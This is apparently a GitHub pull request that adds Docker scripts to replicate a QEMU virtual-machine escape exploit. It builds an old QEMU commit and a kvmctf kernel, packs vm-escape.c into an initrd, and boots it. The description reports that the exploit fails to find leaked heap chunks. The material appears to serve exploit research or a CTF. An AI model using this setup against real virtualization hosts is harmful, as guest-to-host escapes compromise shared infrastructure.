### PR TITLE
Update to provide docker based replication

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -1,2 +1,3 @@
 newinitrd.img
 ./extracted/**/**
+ramdisk.img

--- a/.gitignore
+++ b/.gitignore
@@ -1,3 +1,4 @@
 newinitrd.img
 ./extracted/**/**
 ramdisk.img
+/extracted/

--- a/.gitignore
+++ b/.gitignore
@@ -1,0 +1,2 @@
+newinitrd.img
+./extracted/**/**

--- a/.gitmodules
+++ b/.gitmodules
@@ -1,0 +1,3 @@
+[submodule "qemu"]
+	path = qemu
+	url = https://github.com/qemu/qemu.git

--- a/Dockerfile
+++ b/Dockerfile
@@ -8,5 +8,26 @@ RUN mkdir -p bin/debug/native && \
 	cd bin/debug/native && \
 	../../../configure --target-list=x86_64-softmmu --enable-debug \
         --disable-werror
-RUN cd bin/debug/native && make
+RUN cd bin/debug/native && make && make install
+RUN DEBIAN_FRONTEND=noninteractive apt-get install cpio initramfs-tools-core -y
+# (mkinitramfs -o initrd || true) && \
+RUN mkdir -p /qemu/tmp/tmp/extracted/ 
+COPY extracted /qemu/tmp/tmp/extracted
+#unmkinitramfs initrd ./extracted  &&  \
+RUN cd /qemu/tmp/tmp    && \
+    cd extracted   && \
+    cd early  &&  \
+    find . -print0 | cpio --null --create --format=newc > /qemu/tmp/tmp/newinitrd   && \
+    cd ../early2   && \
+    find kernel -print0 | cpio --null --create --format=newc >> /qemu/tmp/tmp/newinitrd
+
+COPY run_vm_escape.sh ./
+RUN apt-get install wget -y
+RUN wget https://storage.googleapis.com/kvmctf/latest.tar.gz
+RUN tar xzf latest.tar.gz
+RUN cp kvmctf-6.1.74/bzImage/bzImage ./ && mkdir /vm-escape
+COPY ./vm-escape.c ./Makefile /vm-escape
+RUN make -C /vm-escape/ && cp /vm-escape/vm-escape /qemu/tmp/tmp/extracted/main/bin
+RUN cd /qemu/tmp/tmp/extracted/main   && \
+    find . | cpio --create --format=newc | xz --format=lzma >> /qemu/tmp/tmp/newinitrd
 

--- a/Dockerfile
+++ b/Dockerfile
@@ -1,0 +1,12 @@
+FROM ubuntu:18.04
+RUN apt-get update && apt-get install git -y
+RUN git clone https://github.com/qemu/qemu.git
+WORKDIR qemu
+RUN git checkout bd80b59 
+RUN DEBIAN_FRONTEND=noninteractive apt-get install python gcc bison flex make libglib2.0-dev libfdt-dev libpixman-1-dev zlib1g-dev ninja-build -y 
+RUN mkdir -p bin/debug/native && \
+	cd bin/debug/native && \
+	../../../configure --target-list=x86_64-softmmu --enable-debug \
+        --disable-werror
+RUN cd bin/debug/native && make
+

--- a/Makefile
+++ b/Makefile
@@ -1,3 +1,4 @@
+LDFLAGS= -pthread  -lpthread
 CFLAGS=-g -lpthread -std=c11 -D_DEFAULT_SOURCE
 
 all: vm-escape

--- a/init.sh
+++ b/init.sh
@@ -1,0 +1,9 @@
+#mkinitramfs, extract ramdisk.img
+mkinitramfs -o ramdisk.img
+unmkinitramfs ramdisk.img ./extracted
+
+#build everything
+docker build . -t vm_escape
+
+#run docker run_vm_escape
+docker run --device=/dev/kvm -ti vm_escape ./run_vm_escape.sh

--- a/run_vm_escape.sh
+++ b/run_vm_escape.sh
@@ -1,0 +1,8 @@
+qemu-system-x86_64 -enable-kvm -m 2048 -display vnc=:89 \
+        -netdev user,id=t0, -device rtl8139,netdev=t0,id=nic0 \
+        -netdev user,id=t1, -device pcnet,netdev=t1,id=nic1 \
+	-L ./qemu/pc-bios \
+	-nographic \
+	-append "console=ttyS0 nokaslr" \
+	-initrd /qemu/tmp/tmp/newinitrd \
+	-boot c -kernel ./bzImage

--- a/vm-escape.c
+++ b/vm-escape.c
@@ -725,6 +725,10 @@ size_t qemu_get_leaked_chunk(struct rtl8139_ring *ring, size_t nb_packet,
 			}
 		}
 	}
+	if (!nb_leak) {
+		warnx("[!] searched %lu packets with %lu size, %"PRIxHPTR", no chunk found", 
+				nb_packet, size, (long unsigned) leak);
+	}
 	return nb_leak;
 }
 
@@ -1015,7 +1019,7 @@ int main()
 	if (!nb_leak) {
 		errx(-1, "[!] failed to find usable chunks");
 	}
-	warnx("[+] found %d potential ObjectProperty structs in memory", nb_leak);
+	warnx("[+] found %lu potential ObjectProperty structs in memory", nb_leak);
 
 	score = qemu_get_leaked_object_property(leak, nb_leak,
 	                                        &leak_object,


### PR DESCRIPTION
There is a problem: after you run init.sh to initialize a replica, the project all builds and comes together but when you try to run it, it just says: 

vm-escape: [!] failed to find usable chunks

I don't know what I'm doing wrong. Please merge this PR and run init.sh. I think the very last line there fails where I tried to run the script from init, but you can just docker run a bash shell and then call run_vm_escape.sh. Don't forget --device /dev/kvm for that, so it should be:

#docker run --device=/dev/kvm -ti vm_escape ./run_vm_escape.sh  # <== this line from init.sh fails, so run:

docker run --device=/dev/kvm -ti vm_escape /bin/bash

and then in the shell run:

run_vm_escape.sh

This will give you another shell, nested QEMU inside docker, at which point you can run vm-escape to see the failure I reported above.